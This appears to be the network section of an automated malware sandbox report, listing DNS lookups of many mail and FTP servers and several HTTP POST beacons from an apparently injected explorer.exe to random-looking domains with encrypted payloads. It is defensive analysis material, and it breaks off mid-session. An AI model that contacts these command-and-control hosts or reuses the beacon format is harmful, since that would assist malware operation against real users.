                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.610546112 CET1.1.1.1192.168.2.40xa6c2No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.849935055 CET1.1.1.1192.168.2.40x2d4bName error (3)piaggio-bratislava.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:03.891048908 CET1.1.1.1192.168.2.40x5322Name error (3)smtp.brightright.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.006922960 CET1.1.1.1192.168.2.40x818bName error (3)feio.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.007072926 CET1.1.1.1192.168.2.40x666eName error (3)imap.emr.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.007997990 CET1.1.1.1192.168.2.40x2c9fName error (3)dobrybicykel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.011630058 CET1.1.1.1192.168.2.40xdf16Server failure (2)mail.daxter.fsnet.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.017834902 CET1.1.1.1192.168.2.40xcd2Name error (3)mail.dobrybicykel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.032790899 CET1.1.1.1192.168.2.40xafadName error (3)eluxviaggi.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.035120964 CET1.1.1.1192.168.2.40x8f68Name error (3)animekingdom.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.049004078 CET1.1.1.1192.168.2.40x1609Name error (3)gryffindorhouse.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.053967953 CET1.1.1.1192.168.2.40xdde7Server failure (2)ftp.daxter.fsnet.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.065895081 CET1.1.1.1192.168.2.40xa8f0Name error (3)merlynsociety.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.066842079 CET1.1.1.1192.168.2.40x4f94No error (0)mail.ericrothphoto.com35.190.10.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.070220947 CET1.1.1.1192.168.2.40xc255Name error (3)mail.feio.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.075795889 CET1.1.1.1192.168.2.40x4815Name error (3)imap.escolapatelli.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.077703953 CET1.1.1.1192.168.2.40x86a5Name error (3)ftp.feio.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.081752062 CET1.1.1.1192.168.2.40xcbecNo error (0)rotas-sk.mail.protection.outlook.com104.47.18.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.081752062 CET1.1.1.1192.168.2.40xcbecNo error (0)rotas-sk.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.097138882 CET1.1.1.1192.168.2.40x1592No error (0)mail.fermatsk.sk212.57.35.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.103992939 CET1.1.1.1192.168.2.40xd8Name error (3)konic.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.113301992 CET1.1.1.1192.168.2.40xd40cNo error (0)relay3.dnsserver.eu92.240.253.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.117677927 CET1.1.1.1192.168.2.40x6f2Name error (3)spona-na-ponozky.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.120706081 CET1.1.1.1192.168.2.40xebddNo error (0)mx1.hostcreators.sk46.229.238.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.123684883 CET1.1.1.1192.168.2.40x88e7Name error (3)mailgate.elteconline.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.131716967 CET1.1.1.1192.168.2.40xea3cNo error (0)mailin2.kanapy.sk45.13.137.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.154242039 CET1.1.1.1192.168.2.40xa4f6Name error (3)ssh.e-art-studio.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.162883997 CET1.1.1.1192.168.2.40x1e0Name error (3)aquamat-liptov.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.171992064 CET1.1.1.1192.168.2.40x76a3Name error (3)khi-ho.ne.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.172389984 CET1.1.1.1192.168.2.40x9bbName error (3)ftp.khi-ho.ne.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.179181099 CET1.1.1.1192.168.2.40x1bf1Name error (3)pop3.kingsway-hk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.233274937 CET1.1.1.1192.168.2.40xa06bNo error (0)gw2.mx.anafra.net185.32.160.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.239715099 CET1.1.1.1192.168.2.40x8978No error (0)relay1.exohosting.sk92.240.253.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.275235891 CET1.1.1.1192.168.2.40xf364No error (0)ssh.predajpaliet.skpredajpaliet.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.275235891 CET1.1.1.1192.168.2.40xf364No error (0)predajpaliet.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.302995920 CET1.1.1.1192.168.2.40xad39Server failure (2)mail.straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.319422007 CET1.1.1.1192.168.2.40x1c51No error (0)ax-sk1-mx3.ignum.eu185.65.223.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.331880093 CET1.1.1.1192.168.2.40x8df1No error (0)mailgate.predajpaliet.skpredajpaliet.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.331880093 CET1.1.1.1192.168.2.40x8df1No error (0)predajpaliet.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.371412039 CET1.1.1.1192.168.2.40x6c10Name error (3)ivory.plala.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.374437094 CET1.1.1.1192.168.2.40x5d95No error (0)mail.oitacity.jpoitacity.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.374437094 CET1.1.1.1192.168.2.40x5d95No error (0)oitacity.jp59.106.13.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.387614965 CET1.1.1.1192.168.2.40xec0cNo error (0)imap.rotas.skcallisto.domains.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.387614965 CET1.1.1.1192.168.2.40xec0cNo error (0)callisto.domains.skvls003vm03.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.387614965 CET1.1.1.1192.168.2.40xec0cNo error (0)vls003vm03.hostmaster.sk93.184.77.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.388605118 CET1.1.1.1192.168.2.40x813dNo error (0)mail.rotas.skcallisto.domains.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.388605118 CET1.1.1.1192.168.2.40x813dNo error (0)callisto.domains.skvls003vm03.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.388605118 CET1.1.1.1192.168.2.40x813dNo error (0)vls003vm03.hostmaster.sk93.184.77.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.389579058 CET1.1.1.1192.168.2.40xa2cNo error (0)pop.rotas.skcallisto.domains.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.389579058 CET1.1.1.1192.168.2.40xa2cNo error (0)callisto.domains.skvls003vm03.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.389579058 CET1.1.1.1192.168.2.40xa2cNo error (0)vls003vm03.hostmaster.sk93.184.77.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.493422031 CET1.1.1.1192.168.2.40xc983No error (0)pop3.nakacho.com162.43.104.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.517503023 CET1.1.1.1192.168.2.40x6371No error (0)mx2.webhouse.sk93.184.77.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.571110010 CET1.1.1.1192.168.2.40x50e8No error (0)mail.instalanova.skpop3-imap.dnsserver.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.571110010 CET1.1.1.1192.168.2.40x50e8No error (0)pop3-imap.dnsserver.eu92.240.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.571110010 CET1.1.1.1192.168.2.40x50e8No error (0)pop3-imap.dnsserver.eu92.240.253.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.654864073 CET1.1.1.1192.168.2.40x2a6aNo error (0)relay.rotas.skcallisto.domains.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.654864073 CET1.1.1.1192.168.2.40x2a6aNo error (0)callisto.domains.skvls003vm03.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.654864073 CET1.1.1.1192.168.2.40x2a6aNo error (0)vls003vm03.hostmaster.sk93.184.77.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.687091112 CET1.1.1.1192.168.2.40x50e8No error (0)mail.instalanova.skpop3-imap.dnsserver.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.687091112 CET1.1.1.1192.168.2.40x50e8No error (0)pop3-imap.dnsserver.eu92.240.253.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.687091112 CET1.1.1.1192.168.2.40x50e8No error (0)pop3-imap.dnsserver.eu92.240.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.737464905 CET1.1.1.1192.168.2.40x2a6aNo error (0)relay.rotas.skcallisto.domains.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.737464905 CET1.1.1.1192.168.2.40x2a6aNo error (0)callisto.domains.skvls003vm03.hostmaster.skCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.737464905 CET1.1.1.1192.168.2.40x2a6aNo error (0)vls003vm03.hostmaster.sk93.184.77.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792866945 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:04.792889118 CET1.1.1.1192.168.2.40x82fNo error (0)mail.emmetisportfun.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:07.014970064 CET1.1.1.1192.168.2.40x3df5Server failure (2)straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:07.015427113 CET1.1.1.1192.168.2.40x3df5Server failure (2)straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:07.015501022 CET1.1.1.1192.168.2.40x3df5Server failure (2)straznyanjel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com179.25.3.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com180.94.156.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com190.187.52.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:45.877855062 CET1.1.1.1192.168.2.40xaa05No error (0)humydrole.com91.104.83.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                0192.168.2.44973434.94.245.237802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.327044010 CET277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://enporysqhiukeibs.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 111
                                                                                                                                                                                                                                                                                                                                Host: sumagulituyo.org
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.327076912 CET111OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 b1 e0 52 a7
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bOR>%H-[ud1$
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.588922977 CET422INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=8831426e1d6a7dcba208c8dc1e478360|102.129.152.212|1703131342|1703131342|0|1|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.449735104.198.2.251802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.051630020 CET276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://ufwenaivgdjepo.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 219
                                                                                                                                                                                                                                                                                                                                Host: snukerukeutit.org
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.051661015 CET219OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ba a3 28 aa
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bO(h9uEzB^)R%,~]"l{-9B@y4;A:nJU n!XVw$]GS2X3^#OA
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.318156004 CET423INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=3a4b5c6842db5ea6177a950421815209|102.129.152.212|1703131343|1703131343|0|1|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                2192.168.2.44973634.143.166.163802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.336647034 CET281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://ycpdbybbbnmbopuu.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 294
                                                                                                                                                                                                                                                                                                                                Host: lightseinsteniki.org
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.336684942 CET294OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fd e9 34 bd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bO4b;.:mid)K_-ds6)+ J<#(J=`)zo4;\|%~G*)r -s<W`)5P:s"(A
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.914165974 CET426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=06646fa3d860327cc98b4d0ad75b9dce|102.129.152.212|1703131344|1703131344|0|1|0; path=/; domain=.lightseinsteniki.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                3192.168.2.44973734.143.166.163802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.802311897 CET273OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://heyhupmlghsc.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 245
                                                                                                                                                                                                                                                                                                                                Host: liuliuoumumy.org
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.802350998 CET245OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a7 e0 57 bd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bOW4i64n-Wm~pz)IuZ$}:Dx?.<6"UX+]9\y.R7Y()|9q*G1tOR)+=TR
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383229017 CET422INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=a64cb5396367bf0872e3b45d59b6ddfb|102.129.152.212|1703131346|1703131346|0|1|0; path=/; domain=.liuliuoumumy.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                4192.168.2.44973891.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.784163952 CET283OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
